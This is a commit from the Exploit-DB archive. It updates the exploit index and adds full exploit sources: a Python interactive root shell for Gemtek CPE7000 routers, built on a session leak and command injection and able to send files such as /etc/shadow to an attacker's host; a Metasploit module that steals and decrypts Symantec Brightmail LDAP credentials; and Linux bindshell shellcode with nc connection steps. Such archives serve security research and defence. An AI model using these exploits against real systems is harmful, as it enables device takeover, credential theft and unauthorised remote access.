DB: 2016-04-22

5 new exploits

freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability
FreePBX 2.1.3 - (upgrade.php) Remote File Include Vulnerability

FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution
FreePBX <= 2.8.0 - Recordings Interface Allows Remote Code Execution

FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution

FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities
FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities

FreePBX config.php Remote Code Execution
FreePBX - config.php Remote Code Execution
FreePBX 2.5.2 admin/config.php tech Parameter XSS
FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS
FreePBX 2.5.2 - admin/config.php tech Parameter XSS
FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities
Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure
Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities
Linux/x86_64 - bindshell (Port 5600) - 86 bytes
Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)
This commit is contained in:
Offensive Security 2016-04-22 05:03:45 +00:00
parent bd5d486987
commit 22a4c5d4cc
6 changed files with 1774 additions and 7 deletions

View file

@ -2355,7 +2355,7 @@ id,file,description,date,author,platform,type,port
2662,platforms/asp/webapps/2662.txt,"Hosting Controller <= 6.1 Hotfix 3.2 - Remote Unauthenticated Vulnerabilities",2006-10-27,"Soroush Dalili",asp,webapps,0
2663,platforms/php/webapps/2663.txt,"PhpShop Core <= 0.9.0 RC1 - (PS_BASE) File Include Vulnerabilities",2006-10-28,"Cold Zero",php,webapps,0
2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0beta (viewticket.php) Local Include Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0
2665,platforms/php/webapps/2665.txt,"freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - (upgrade.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 (Core/core.inc.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
2668,platforms/php/webapps/2668.htm,"MiraksGalerie <= 2.62 (pcltar.lib.php) Remote File Include Exploit",2006-10-28,ajann,php,webapps,0
@ -13155,7 +13155,7 @@ id,file,description,date,author,platform,type,port
15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0
15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0
15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos,0
15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0
15102,platforms/win32/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win32,webapps,80
15103,platforms/windows/dos/15103.py,"VMware Workstation <= 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0
@ -16169,7 +16169,7 @@ id,file,description,date,author,platform,type,port
18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow_",2012-03-24,metasploit,windows,remote,0
18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0
18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0
18676,platforms/php/webapps/18676.txt,"boastMachine <= 3.1 - CSRF Add Admin Vulnerability",2012-03-28,Dr.NaNo,php,webapps,0
@ -26981,7 +26981,7 @@ id,file,description,date,author,platform,type,port
29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0
29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.PHP Remote File Include Vulnerability",2007-04-20,Omni,php,webapps,0
29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service Vulnerability",2007-04-21,"Levent Kayan",multiple,dos,0
29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 You.PHP Cross-Site Scripting Vulnerability",2007-04-23,the_Edit0r,php,webapps,0
@ -27497,7 +27497,7 @@ id,file,description,date,author,platform,type,port
32417,platforms/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0
32416,platforms/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0
32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0
32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
32512,platforms/unix/remote/32512.rb,"FreePBX - config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
32413,platforms/php/webapps/32413.txt,"InterTech WCMS 'etemplate.php' SQL Injection Vulnerability",2008-09-23,"GeNiUs IrAQI",php,webapps,0
32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform 'browser.asp' Parameter Directory Traversal Vulnerability",2008-09-23,AlbaniaN-[H],asp,webapps,0
32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-23,"Hadi Kiamarsi",php,webapps,0
@ -30153,8 +30153,8 @@ id,file,description,date,author,platform,type,port
33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting Vulnerability",2009-12-24,"Steven Abbagnaro",php,webapps,0
33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include Vulnerability",2009-12-29,F10riX,php,webapps,0
33441,platforms/php/webapps/33441.txt,"Joomla! Joomulus Component 2.0 - 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-12-28,MustLive,php,webapps,0
33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Include Vulnerability",2009-12-28,Securitylab.ir,php,webapps,0
33445,platforms/php/webapps/33445.txt,"phpInstantGallery 1.1 - 'admin.php' Cross-Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
@ -35931,3 +35931,8 @@ id,file,description,date,author,platform,type,port
39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
39712,platforms/win64/dos/39712.txt,"Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win64,dos,0
39713,platforms/windows/dos/39713.c,"Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0
39714,platforms/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",php,webapps,80
39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure",2016-04-21,"Fakhir Karim Reda",java,webapps,443
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0

Can't render this file because it is too large.

View file

@ -0,0 +1,227 @@
#!/usr/bin/python
'''
# Exploit Title: Gemtek CPE7000 / WLTCS-106 multiple vulnerabilities
# Date: 04/06/2016
# Exploit Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
# Vendor Homepage: gemtek.com.tw
# Version: Firmware Version 01.01.02.082
# Tested on:
# Product Name : CPE7000
# Model ID : WLTCS-106
# Hardware Version : V02A
# Firmware Version : 01.01.02.082
1) SID leak / auth bypass
The sysconfg cgi application leaks a valid "SID" (session id) when the
following unauthenticated request is made:
Request: GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=login_confirm HTTP/1.1
The response body has the form: <checkcode>,<sid>
Example resp: RJIi,BtsS2OdhcVSbviDC5iMa1MKeo9rbrgdQ
The sid thus obtained can be used to "unlock" the cliend-side administration
interface and/or to directly issue request that are usually restricted to
administrative accounts.
POCs:
I) Unauthenticated remote reboot:
Request:
/cgi-bin/sysconf.cgi?page=ajax_check.asp&action=reboot&reason=1&sid=<SID>
II) Web admin interface access. Add a new cookie with the following values:
userlevel=2
sid=<sid>
--------------------------------------------------------------------------------
2) Arbitrary file download - with root privileges - via iperf tool
One of the diagnostic tools available on the device can be used to read an
arbitrary file on the device. The sysconfg cgi application fails to sanitize
user input, allowing an attacker to hijack the command issued to the "iperf"
binary, a commonly-used network testing tool that can create TCP and UDP data
streams and measure the throughput of a network that is carrying them.
The client-side validation can be easily bypassed by changing the javascript
validation code, or by directly sending a forged request to the server.
The iperf tool is run with the -c switch, meaning that it is behaving as a
client that sends data to a server. By adding the -F parameter, iperf is forced
to read data from a file instead of generating random data to be sent during the
measurement.
This attack needs 2 step in order to take advantage of the vulnerability.
The first request sets up the command be to run, the second one (a.k.a. toggle)
actually runs the command (check the response body, 1 means running, 0 means stopped).
The following "SETUP" request can be used to set the correct parameters:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=ZZ&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&
perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20 <URLENCODED PATH TO
FILE>
Parameters breakdown:
XXX.XXX.XXX.XXX = attacker ip
YYYY = attacker listening port
zz = time limit
Note: nc is enough to capture data, which may be sent with some additional
header and footer introduced by iperf's protocol
In order to run iperf, the following "TOGGLE" (run/stop) request must be sent:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
POCs:
I) download of /etc/shadow
SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=30&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&p
erf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fetc%2fshadow
RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
II) download of device physical memory (/dev/mem) with increased perf_measure_test_time:
SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=6000&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024
&perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fdev%2fmem
RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
--------------------------------------------------------------------------------
3) Unauthenticated remote root command execution
The same vulnerability can be used to issue an arbitrary command on the device.
The command executed on the system to run the diagnostic tool is constructed
using the sprintf function and the following format string, with no additional
checks:
iperf -c "%s" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &
It is therefore possible to insert another command by injecting it in the
"perf_measure_server_ip" parameter and commenting out the rest of the original
command.
To concatenate a command, the string in the first half before the injection
point ( iperf -c " ) must be correctly closed with quotes ( " ).
Then the new command can be added, preceded by a semicolon ( ; ).
Finally, the other part of the original command after the "injection point"
must be commented out ( # ).
iperf -c ""; <NEWCMD> #" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &
SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=%22%3b%20<COMMAND_HERE>%20%23&perf_measure_server_port=5555&perf_measure_cpe_p
ort=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_pac
ket_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1
RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
POC (echo test > /www/test):
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=%22%3b%20echo%20test%20%3E%20%2fwww%2ftest%20%23&perf_measure_server_port=5555
&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type
=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_
client_num=1
and toggle:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
--------------------------------------------------------------------------------
Remediation:
Disable wan access to the management web interface until an updated firmware is released.
More information and a detailed how-to is available at: http://www.mentat.is/docs/cpe7000-multiple-vulns.html
'''
#Gemtek CPE7000 / WLTCS-106 remote root command execution
#Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
# Tested on:
# Product Name : CPE7000
# Model ID : WLTCS-106
# Hardware Version : V02A
# Firmware Version : 01.01.02.082
import httplib
import ssl
import urllib
import time
import sys
import getopt
import socket
ssl._create_default_https_context = ssl._create_unverified_context
host=''
port = 443
def check():
try:
conn = httplib.HTTPSConnection(host +":"+str(port), timeout=10)
conn.request("GET", "/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1")
r1 = conn.getresponse()
if r1.status != 200:
return False
return True
except socket.error as msg:
print "Cannot connect";
sys.exit();
def sendcmd( cmd ):
resource = '"; ' + cmd + ' &> /www/cmdoutput.txt #'
urlencoded = urllib.quote_plus(resource)
cmdresource = "/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_ip=" +urlencoded + "&perf_measure_server_port=5555&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1"
res = makereq (cmdresource)
res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
if(res!="1"):
res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
time.sleep(1)
res = makereq ("/cmdoutput.txt")
print res
def makereq (resource):
conn = httplib.HTTPSConnection(host +":"+str(port))
conn.request("GET", resource)
r1 = conn.getresponse()
body = r1.read()
return body
if len(sys.argv) < 2:
print 'GemtekShell.py <host> [<port> (443)]'
exit()
elif len(sys.argv) > 2:
port = sys.argv[2]
host = sys.argv[1]
print 'Connecting to ', host, port
if not check() :
print "Host seems not vulnerable"
sys.exit()
while(1):
cmd = raw_input("gemtekCMD> ")
if cmd.strip() != "quit" :
sendcmd(cmd)
else :
sys.exit()

308
platforms/java/webapps/39715.rb Executable file
View file

@ -0,0 +1,308 @@
# Exploit Title: Symantec Brightmail ldap credential Grabber
# Date: 18/04/2016
# Exploit Author: Fakhir Karim Reda
# Vendor Homepage: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year&suid=20160418_00
# Version: 10.6.0-7 and earlier
# Tested on: Linux, Unox Windows
# CVE : CVE-2016-2203
#Symantec Brightmail 10.6.0-7 and earlier save the AD password somewhere in the product. By having a read account on the gateway we can recover the AD #ACOUNT/PASSWORD
#indeed the html code contains the encrypted AD password.
#the encryption and decryption part is implemented in Java in the appliance, by reversing the code we get to know the encryption algorithm:
#public static String decrypt(String password)
#{
#byte clearText[];
#try{
#PBEKeySpec keySpec = new PBEKeySpec("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"{}`~!@#$%^&*()_+-=".toCharArray());
#SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
#SecretKey secretKey = keyFactory.generateSecret(keySpec);
#System.out.println("Encoded key "+ (new String(secretKey.getEncoded())));
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require "base64"
require 'digest'
require "openssl"
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Messaging Gateway 10 LDAP Creds Graber',
'Description' => %q{
This module will grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed symantec pbe key. Note that authentication is required in order to successfully grab the LDAP credentials, you need at least a read account. Version 10.6.0-7 and earlier are affected
},
'References' =>
[
['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'],
['CVE','2016-2203'],
['BID','86137']
],
'Author' =>
[
'Fakhir Karim Reda <karim.fakhir[at]gmail.com>'
],
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'TLS1',
'RPORT' => 443
},
'License' => MSF_LICENSE,
'DisclosureDate' => "Dec 17 2015"
))
register_options(
[
OptInt.new('TIMEOUT', [true, 'HTTPS connect/read timeout in seconds', 1]),
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'The username to login as']),
OptString.new('PASSWORD', [true, 'The password to login with'])
], self.class)
deregister_options('RHOST')
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: 'LDAP',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def auth(username, password, sid, last_login)
# Real JSESSIONID cookie
sid2 = ''
res = send_request_cgi({
'method' => 'POST',
'uri' => '/brightmail/login.do',
'headers' => {
'Referer' => "https://#{peer}/brightmail/viewLogin.do",
'Connection' => 'keep-alive'
},
'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}",
'vars_post' => {
'lastlogin' => last_login,
'userLocale' => '',
'lang' => 'en_US',
'username' => username,
'password' => password,
'loginBtn' => 'Login'
}
})
if res.body =~ /Logged in/
sid2 = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
return sid2
end
if res and res.headers['Location']
mlocation = res.headers['Location']
new_uri = res.headers['Location'].scan(/^http:\/\/[\d\.]+:\d+(\/.+)/).flatten[0]
res = send_request_cgi({
'uri' => new_uri,
'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}"
})
sid2 = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
return sid2 if res and res.body =~ /Logged in/
end
return false
end
def get_login_data
sid = '' #From cookie
last_login = '' #A hidden field in the login page
res = send_request_raw({'uri'=>'/brightmail/viewLogin.do'})
if res and !res.get_cookies.empty?
sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
end
if res
last_login = res.body.scan(/<input type="hidden" name="lastlogin" value="(.+)"\/>/).flatten[0] || ''
end
return sid, last_login
end
# Returns the status of the listening port.
#
# @return [Boolean] TrueClass if port open, otherwise FalseClass.
def port_open?
begin
res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT'])
return true if res
rescue ::Rex::ConnectionRefused
print_status("#{peer} - Connection refused")
return false
rescue ::Rex::ConnectionError
print_error("#{peer} - Connection failed")
return false
rescue ::OpenSSL::SSL::SSLError
print_error("#{peer} - SSL/TLS connection error")
return false
end
end
# Returns the derived key from the password, the salt and the iteration count number.
#
# @return Array of byte containing the derived key.
def get_derived_key(password, salt, count)
key = password + salt
for i in 0..count-1
key = Digest::MD5.digest(key)
end
kl = key.length
return key[0,8], key[8,kl]
end
# @Return the deciphered password
# Algorithm obtained by reversing the firmware
#
def decrypt(enc_str)
pbe_key="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-="
salt = (Base64.strict_decode64(enc_str[0,12]))
remsg = (Base64.strict_decode64(enc_str[12,enc_str.length]))
(dk, iv) = get_derived_key(pbe_key, salt, 1000)
alg = "des-cbc"
decode_cipher = OpenSSL::Cipher::Cipher.new(alg)
decode_cipher.decrypt
decode_cipher.padding = 0
decode_cipher.key = dk
decode_cipher.iv = iv
plain = decode_cipher.update(remsg)
plain << decode_cipher.final
return plain.gsub(/[\x01-\x08]/,'')
end
def grab_auths(sid,last_login)
token = '' #from hidden input
selected_ldap = '' # from checkbox input
new_uri = '' # redirection
flow_id = '' # id of the flow
folder = '' # symantec folder
res = send_request_cgi({
'method' => 'GET',
'uri' => "/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
'headers' => {
'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
'Connection' => 'keep-alive'
},
'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid};"
})
if res
token = res.body.scan(/<input type="hidden" name="symantec.brightmail.key.TOKEN" value="(.+)"\/>/).flatten[0] || ''
selected_ldap = res.body.scan(/<input type="checkbox" value="(.+)" name="selectedLDAP".+\/>/).flatten[0] || ''
else
return false
end
res = send_request_cgi({
'method' => 'POST',
'uri' => "/brightmail/setting/ldap/LdapWizardFlow$edit.flo",
'headers' => {
'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
'Connection' => 'keep-alive'
},
'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ",
'vars_post' => {
'flowId' => '0',
'userLocale' => '',
'lang' => 'en_US',
'symantec.brightmail.key.TOKEN'=> "#{token}",
'selectedLDAP' => "#{selected_ldap}"
}
})
if res and res.headers['Location']
mlocation = res.headers['Location']
new_uri = res.headers['Location'].scan(/^https:\/\/[\d\.]+(\/.+)/).flatten[0]
flow_id = new_uri.scan(/.*\?flowId=(.+)/).flatten[0]
folder = new_uri.scan(/(.*)\?flowId=.*/).flatten[0]
else
return false
end
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{folder}",
'headers' => {
'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
'Connection' => 'keep-alive'
},
'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ",
'vars_get' => {
'flowId' => "#{flow_id}",
'userLocale' => '',
'lang' => 'en_US'
}
})
if res and res.code == 200
login = res.body.scan(/<input type="text" name="userName".*value="(.+)"\/>/).flatten[0] || ''
password = res.body.scan(/<input type="password" name="password".*value="(.+)"\/>/).flatten[0] || ''
host = res.body.scan(/<input name="host" id="host" type="text" value="(.+)" class/).flatten[0] || ''
port = res.body.scan(/<input name="port" id="port" type="text" value="(.+)" class/).flatten[0] || ''
password = decrypt(password)
print_good("Found login = '#{login}' password = '#{password}' host ='#{host}' port = '#{port}' ")
report_cred(ip: host, port: port, user:login, password: password, proof: res.code.to_s)
end
end
def run_host(ip)
return unless port_open?
sid, last_login = get_login_data
if sid.empty? or last_login.empty?
print_error("#{peer} - Missing required login data. Cannot continue.")
return
end
username = datastore['USERNAME']
password = datastore['PASSWORD']
sid = auth(username, password, sid, last_login)
if not sid
print_error("#{peer} - Unable to login. Cannot continue.")
return
else
print_good("#{peer} - Logged in as '#{username}:#{password}' Sid: '#{sid}' LastLogin '#{last_login}'")
e nd
grab_auths(sid,last_login)
end
end

View file

@ -0,0 +1,88 @@
/*
---------------------------------------------------------------------------------------------------
Linux/x86_64 - bindshell (PORT: 5600) - 86 bytes
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
0000000000400080 <.text>:
400080: 48 31 c0 xor %rax,%rax
400083: 48 31 f6 xor %rsi,%rsi
400086: 99 cltd
400087: 6a 29 pushq $0x29
400089: 58 pop %rax
40008a: ff c6 inc %esi
40008c: 6a 02 pushq $0x2
40008e: 5f pop %rdi
40008f: 0f 05 syscall
400091: 48 97 xchg %rax,%rdi
400093: 6a 02 pushq $0x2
400095: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp)
40009c: 54 push %rsp
40009d: 5e pop %rsi
40009e: 52 push %rdx
40009f: 6a 10 pushq $0x10
4000a1: 5a pop %rdx
4000a2: 6a 31 pushq $0x31
4000a4: 58 pop %rax
4000a5: 0f 05 syscall
4000a7: 50 push %rax
4000a8: 5e pop %rsi
4000a9: 6a 32 pushq $0x32
4000ab: 58 pop %rax
4000ac: 0f 05 syscall
4000ae: 6a 2b pushq $0x2b
4000b0: 58 pop %rax
4000b1: 0f 05 syscall
4000b3: 48 97 xchg %rax,%rdi
4000b5: 6a 03 pushq $0x3
4000b7: 5e pop %rsi
4000b8: ff ce dec %esi
4000ba: b0 21 mov $0x21,%al
4000bc: 0f 05 syscall
4000be: 75 f8 jne 0x4000b8
4000c0: 48 31 c0 xor %rax,%rax
4000c3: 99 cltd
4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
4000cb: 2f 73 68
4000ce: 53 push %rbx
4000cf: 54 push %rsp
4000d0: 5f pop %rdi
4000d1: 6a 3b pushq $0x3b
4000d3: 58 pop %rax
4000d4: 0f 05 syscall
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o bind_shell bind_shell.c
$ execstack -s sh_shell
$ ./sh_shell
How to Connect
$ nc <HOST IP ADDRESS> 5600
Eg:
$ nc 127.0.0.1 5600
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
